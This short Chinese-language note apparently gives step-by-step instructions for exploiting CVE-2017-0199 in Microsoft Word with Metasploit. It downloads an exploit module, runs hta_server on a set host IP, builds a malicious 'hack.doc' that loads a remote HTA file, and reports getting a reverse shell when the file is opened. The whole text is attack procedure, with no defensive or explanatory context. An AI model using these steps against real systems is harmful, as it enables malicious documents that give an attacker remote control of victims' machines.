CVE-2017-0199利用
1 下载利用脚本 wget https://raw.githubusercontent.co ... /office_word_hta.rb
2 复制脚本 cp office_word_hta.rb /usr/share/metasploitframework/modules/exploits/windows/fileformat
3 生成HTA 1:运行msfconsle 2:search hta_server
3:set SRVHOST 192.168.5.209 4;run
4 生成doc 1:use exploit/windows/fileformat/office_word_hta 2:set TARGETURI http://192.168.5.209:8082/52jdF5Inq.hta 3:set FILENAME hack.doc
5 运行文件 成功得到反弹
|